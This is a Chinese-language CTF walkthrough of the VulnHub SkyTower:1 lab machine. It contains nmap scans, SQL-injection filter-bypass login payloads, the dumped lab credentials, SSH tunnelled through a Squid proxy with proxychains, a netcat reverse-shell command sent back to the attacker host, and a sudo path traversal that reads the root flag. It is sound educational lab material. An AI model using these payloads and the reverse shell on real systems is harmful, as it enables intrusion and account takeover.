vulnhub靶机渗透[SkyTower-1]

Posted on Edited on In Views: Word count in article: 1.6k Reading time ≈ 6 mins.

名称

名称:SkyTower: 1
发布日期:2014年6月26日

下载

SkyTower.zip

  • Download (Mirror): https://download.vulnhub.com/skytower/SkyTower.zip
  • Download (Torrent): https://download.vulnhub.com/skytower/SkyTower.zip.torrent

描述

欢迎来到SkyTower:1

该CTF靶机是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者,使用多方面的方法攻击系统并获得“flag”的能力。

将需要跨系统和应用程序漏洞的各个方面的技能,以及对各种服务以及如何攻击它们的理解。最重要的是,渗透测试的逻辑思维和方法性方法将发挥作用,以使能够成功地攻击此系统。尝试不同的变体和方法。会发现自动化工具无法为提供帮助。

鼓励先自己尝试一下,给自己足够的时间,然后再回到下面的演练中。

请享用!
Telspace Systems
@telspacesystems

信息收集

上nmap

1
2
3
4
root@kali:~/vulnhub/SkyTower# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.101
Host is up (0.00015s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
1
2
3
4
5
root@kali:~# nmap -p- -v -sV 192.168.56.101
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
3128/tcp open     http-proxy Squid http proxy 3.1.20
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# nmap -p 22,80,3128 -v -A -T4 --script=vuln 192.168.56.101
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.101:80/
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /login.php: Possible admin folder
|_http-server-header: Apache/2.2.22 (Debian)
| http-sql-injection: 
|   Possible sqli for forms:
|     Form at path: /, form's action: login.php. Fields that might be vulnerable:
|_      email
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-server-header: squid/3.1.20

在使用nmap进行主动扫描之后,发现了以下服务。ssh,http,http代理。

ssh端口已被过滤,因此只能访问http和代理。从http开始。

在对目标使用nikto和dirb之后,没有发现任何有趣的东西。

访问80端口的网站,并抓包分析

email参数容易受到SQL注入的攻击。

但是使用sqlmap等自动化sql注入测试工具无法跑出数据,因为对sql注入语句做了过滤,需要想办法寻找payload绕过

多输入一些不同类型的字符测试发包,正如从响应中看到的那样,

1
SQL会过滤“OR”可以很容易使用“||”绕过

使用以下两个payload都可以绕过对sql注入语句中“or”的过滤

payload1

1
email=' || email LIKE '%';#

payload2

1
'oorr 1> 0#'

能够绕过身份验证,并显示以下内容。

当用户登录时,会显示明确的用户名和密码,并提示您登录ssh,但端口已过滤。但是,尝试枚举Web应用程序中的所有用户。启动一个Burp intruder实例以暴力破解并枚举Web应用程序中的所有有效电子邮件,用户名和密码。

因此,得到了电子邮件,以j开头,另一个以s开头,以w开头。现在,当每封电子邮件登录时,获得了以下数据。

  • Payload used : [email=’ || email LIKE ‘j%’;#]
1
2
Username: john
Password: hereisjohn
  • Payload used : [email=’ || email LIKE ‘w%’;#]
1
2
Username: william
Password: senseable
  • Payload used : [email=’ || email LIKE ‘s%’;#]
1
2
Username: sara
Password: ihatethisjob

因此,在获得SSH用户名和密码后,尝试登录并提升权限。

问题在于SSH端口已被过滤。

通过端口扫描,找到了一个代理,并使用代理链通过代理转发连接并访问ssh。

将以下行添加到/etc/proxychains.conf中

1
http 192.168.56.101 3128

getshell

现在尝试通过命令行连接ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~/vulnhub/SkyTower# proxychains ssh john@127.0.0.1
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-192.168.56.101:3128-<>-127.0.0.1:1080-<--denied
|D-chain|-<>-192.168.56.101:3128-<><>-127.0.0.1:22-<><>-OK
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:QYZqyNNW/Z81N86urjCUIrTBvJ06U9XDDzNv91DYaGc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 
john@127.0.0.1's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 127.0.0.1 closed.

无法使用用户william登录。使用sara和john auto登录将关闭连接。尝试在ssh连接时执行命令。

1
2
3
4
5
6
root@kali:~/vulnhub/SkyTower# proxychains ssh john@127.0.0.1 nc 192.168.56.102 5566 -e /bin/bash
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-192.168.56.101:3128-<>-127.0.0.1:1080-<--denied
|D-chain|-<>-192.168.56.101:3128-<><>-127.0.0.1:22-<><>-OK
Enter passphrase for key '/root/.ssh/id_rsa': 
john@127.0.0.1's password:

kali端使用nc监听端口,得到反弹回来的shell

1
2
3
4
5
6
7
8
9
10
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.101: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 34901
id
uid=1000(john) gid=1000(john) groups=1000(john)
whoami
john
pwd
/home/john

代表用户john进行枚举后没有发现任何有趣的内容,因此该切换帐户了。无法使用william登录,因此只保留了sara。以sara身份登录后,看起来sara可以使用sudo运行命令。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.101: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 34906
id
uid=1001(sara) gid=1001(sara) groups=1001(sara)
whoami
sara
sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

如所见,sara可以使用sudo运行以下命令cat和ls,目录必须为/accounts/*

找到flag

1
2
3
sudo /bin/cat /accounts/../../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower

然后连接root账户的ssh,成功获取root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~/vulnhub/SkyTower# proxychains ssh root@127.0.0.1 -t "/bin/bash"
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-192.168.56.101:3128-<>-127.0.0.1:1080-<--denied
|D-chain|-<>-192.168.56.101:3128-<><>-127.0.0.1:22-<><>-OK
Enter passphrase for key '/root/.ssh/id_rsa': 
root@127.0.0.1's password: 
root@SkyTower:~# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:~# whoami
root
root@SkyTower:~# ls
flag.txt
root@SkyTower:~# cat flag.txt 
Congratz, have a cold one to celebrate!
root password is theskytower
root@SkyTower:~#

知识点总结

  • sql注入绕过过滤
  • 使用proxychains代理http-proxy连接被过滤的ssh端口

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…